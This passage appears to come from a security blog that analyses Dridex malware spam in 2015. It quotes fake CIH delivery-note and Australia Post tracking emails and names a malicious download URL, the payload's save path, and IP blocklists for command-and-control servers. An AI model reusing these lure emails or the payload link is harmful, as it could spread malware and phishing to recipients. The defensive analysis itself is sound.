It also drops another variant of the same downloader, edg1.exe with a detection rate of 3/56 and a Dridex DLL with a detection rate of 9/56.
Recommended blocklist:
188.120.225.17
121.50.43.175
82.151.131.129
92.63.88.0/24
95.163.121.0/24
199.201.121.169
188.226.129.49
192.64.11.232
77.74.103.150
1.164.114.195
5.135.28.104/29
46.19.143.151
Malware spam: "Batchuser BATCHUSER [ecommsupport@cihgroup.com]" / "CIH Delivery Note 0051037484"
From: Batchuser BATCHUSER [ecommsupport@cihgroup.com]Apart from the disclaimer there is no body text. If you do as the disclaimer says and run attached Word document (CIH Delivery Note 0051037484.doc) through an anti-virus product then it will appear to clean, but it actually contains this malicious macro [pastebin] which downloads a component from:
Date: 31 March 2015 at 09:15
Subject: CIH Delivery Note 0051037484
**********************************************************************
This email and the information it contains are private, may be confidential and are for the intended recipient only. If you received this email in error please notify the sender immediately, confirm that it has been deleted from your system and that all copies have been destroyed. You should not copy it for any purpose or disclose its contents to any other person.
Internet communications are not secure and therefore CIH does not accept legal responsibility for the contents of this message.
We use reasonable endeavours to virus scan all outgoing emails but no warranty is given that this email and any attachments are virus free. You should undertake your own virus checking. We reserve the right to monitor email communications through our networks.
Combined Independents (Holdings) Ltd is registered in England No 767658 and has its registered offices at
Euro House, Joule Road, Andover, SP10 3GD
**********************************************************************
http://www.tschoetz.de/122/091.exe
This is saved as %TEMP%\stoiki86.exe. There are usually two or three different download locations, but they will all lead to the the same binary which in this case has a detection rate of 5/56.
Various automated analysis tools [1] [2] [3] [4] show traffic to the following IPs:
91.242.163.70 (OOO Sysmedia, Russia)
37.139.47.81 (Comfortel Ltd / Pirix, Russia)
72.167.62.27 (GoDaddy, US)
212.227.89.182 (1&1, Germany)
46.228.193.201 (Aqua Networks Ltd, Germany)
46.101.49.125 (Digital Ocean Inc, Netherlands)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc, US)
95.211.184.249 (Leaseweb, Netherlands)
According to this Malwr report it also drops another version of the downloader [VT 4/57] and a malicious DLL which will almost definitely be Dridex [VT 2/57].
Recommended blocklist:
91.242.163.70
37.139.47.81
72.167.62.27
212.227.89.182
46.228.193.201
46.101.49.125
198.245.70.182
95.211.184.249
Malware spam: "Australia Post" / "Track Advice Notification: Consignment RYR58947332
From: Australia Post [noreply@auspost.com.au]I have only seen one sample of this and the Cubby download page was showing quota exceed. However, the payload will be identical to the one found in this other Australian-themed spam running concurrently.
Date: 31 March 2015 at 23:25
Subject: Track Advice Notification: Consignment RYR5894733
Your parcel (1) has been dispatched with Australia Post.
The courier company was not able to deliver your parcel by your address.
Label is enclosed to the letter. Print a label and show it at your post office.
Label: RYR5894733
To view/download your label please click here or follow the link below :
https://eparceltrack.auspost.com.au/external/webui/aspx?LabelCode=label_5894733
**Please note that this is an automatically generated email - replies will not be answered.
Subscribe to:
Posts (Atom)